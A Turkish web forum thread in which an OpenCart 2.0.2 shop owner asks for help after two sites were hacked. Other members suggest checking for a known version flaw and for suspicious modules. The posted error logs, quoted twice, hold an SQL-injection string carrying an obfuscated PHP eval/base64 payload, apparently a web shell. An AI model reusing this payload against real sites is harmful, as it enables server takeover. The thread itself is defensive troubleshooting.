• 09-07-2018, 11:57:42
    #1
    Merhabalar, 2 farklı web sitem 1 hafta içerisinde hacklendi. Opencart konusunda ok fazla bilgim yok ve bu güvenlik açıklarının nereden kaynaklandığını anlamaya çalışıyorum. İlk hacklenen web sitesini hızlı bir şekilde eski haline aldığım için inceleme fırsatım olmamaıştı. Bugün diğer e-ticaret sitem hacklenmiş. Acele etmeden inceledim ve hata kodlarında aşağıdaki kaynaklara ulaştım. Opencart sürümüm 2.0.2'dir. Konuyla alakalı tecrübeli arkadaşların tavsiyelerini bekliyorum.

    Bu hata kayıtlarından ne çıkarılabilir sizce?

    2018-07-08 18:22:06 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a.sql kodlar  :
    SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8Z' at line 1<br />Error No: 1064<br />a.sql kodlar  :
    SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
    /iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
    DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
    sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table` in /var/www/vhosts/xxx.com/httpdocs/system/library/db/mysqli.php on line 41
    2018-07-08 23:35:17 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/xxx.com/httpdocs/system/library/session.php on line 12
    2018-07-08 23:38:09 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/xxx.com/httpdocs/system/library/session.php on line 12
  • 09-07-2018, 12:03:40
    #2
    Site adreslerini özel yollarsanız bir penetrasyon yapalım.
  • 09-07-2018, 12:16:22
    #3
    Üyeliği durduruldu
    bulutaylak adlı üyeden alıntı: mesajı görüntüle
    Merhabalar, 2 farklı web sitem 1 hafta içerisinde hacklendi. Opencart konusunda ok fazla bilgim yok ve bu güvenlik açıklarının nereden kaynaklandığını anlamaya çalışıyorum. İlk hacklenen web sitesini hızlı bir şekilde eski haline aldığım için inceleme fırsatım olmamaıştı. Bugün diğer e-ticaret sitem hacklenmiş. Acele etmeden inceledim ve hata kodlarında aşağıdaki kaynaklara ulaştım. Opencart sürümüm 2.0.2'dir. Konuyla alakalı tecrübeli arkadaşların tavsiyelerini bekliyorum.

    Bu hata kayıtlarından ne çıkarılabilir sizce?

    2018-07-08 18:22:06 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a.sql kodlar  :
    SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8Z' at line 1<br />Error No: 1064<br />a.sql kodlar  :
    SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
    /iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
    DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
    sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table` in /var/www/vhosts/monidec.com/httpdocs/system/library/db/mysqli.php on line 41
    2018-07-08 23:35:17 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/monidec.com/httpdocs/system/library/session.php on line 12
    2018-07-08 23:38:09 - PHP Notice:  session_start(): ps_files_cleanup_dir: opendir(/var/lib/php/session) failed: Permission denied (13) in /var/www/vhosts/monidec.com/httpdocs/system/library/session.php on line 12
    2 Siteyi de Kuran arkadaş aynı kişiler mi?
    ve Temalarınız lisanslı mı ?
  • 09-07-2018, 12:23:47
    #4
    OkyanusMaster adlı üyeden alıntı: mesajı görüntüle
    2 Siteyi de Kuran arkadaş aynı kişiler mi?
    ve Temalarınız lisanslı mı ?
    Web sitelerini ben kurdum. Temalar lisanslı tabiki de, eklentileri de farklı bir kişiden satın aldık. Siteyi hackleyenler aynı kişiler değil ve yeni açılan bir siteyi hele ki reklamı vs yapılmamış, bulup girmeleri büyük ihtimelle google üzerinden tarama yaparak gelmişler diye düşünüyorum.
  • 09-07-2018, 12:29:42
    #5
    Üyeliği durduruldu
    bulutaylak adlı üyeden alıntı: mesajı görüntüle
    Web sitelerini ben kurdum. Temalar lisanslı tabiki de, eklentileri de farklı bir kişiden satın aldık. Siteyi hackleyenler aynı kişiler değil ve yeni açılan bir siteyi hele ki reklamı vs yapılmamış, bulup girmeleri büyük ihtimelle google üzerinden tarama yaparak gelmişler diye düşünüyorum.
    Siteyi ekleyenler aynı kişiler demek istemedim zaten
    Tema lisanssızsa açık olabilir, eklentiden dolayı da açık olabilir.
    Opencart 2.0.2 versiyonun açıklarını kontrol et.
  • 09-07-2018, 13:20:55
    #6
    2.0 ve 2.1 sürümlerinde ciddi bir güvenlik açığı olduğunu aylar öncesinden duyurmuştuk. siteleriniz yedekten restore ettikten sonra pm ile göndereceğim önlemi alın.
  • 09-07-2018, 13:42:19
    #7
    KilitX adlı üyeden alıntı: mesajı görüntüle
    2.0 ve 2.1 sürümlerinde ciddi bir güvenlik açığı olduğunu aylar öncesinden duyurmuştuk. siteleriniz yedekten restore ettikten sonra pm ile göndereceğim önlemi alın.
    Yardımlarınız için teşekkür ederim. O duyuru konusuna nasıl ulaşabilirim acaba? bununla alakalı bir kaynak da varsa inanın çok iyi olur. Teşekkür ederim.
  • 09-07-2018, 14:21:43
    #8
    FROM `mouwaffek_table` in su kod daha once benim karşıma baska bir yerde cikmisti. bir modulden kaynaklıydı.hatırlayamadım ama modullerinizi bi kontrol edebilirmisiniz. sorunun kaynagı bu tabloyu atan modül olabilir.
    • bulutaylak
    bulutaylak bunu beğendi.
    1 kişi bunu beğendi.
  • 09-07-2018, 15:15:57
    #9
    Üyeliği durduruldu
    Misafir adlı üyeden alıntı: mesajı görüntüle
    FROM `mouwaffek_table` in su kod daha once benim karşıma baska bir yerde cikmisti. bir modulden kaynaklıydı.hatırlayamadım ama modullerinizi bi kontrol edebilirmisiniz. sorunun kaynagı bu tabloyu atan modül olabilir.
    Nette araştırıldığında bu tablo Opencart Attack için kullanılıyormuş. Bunu devre dışı bırakmak gerekir.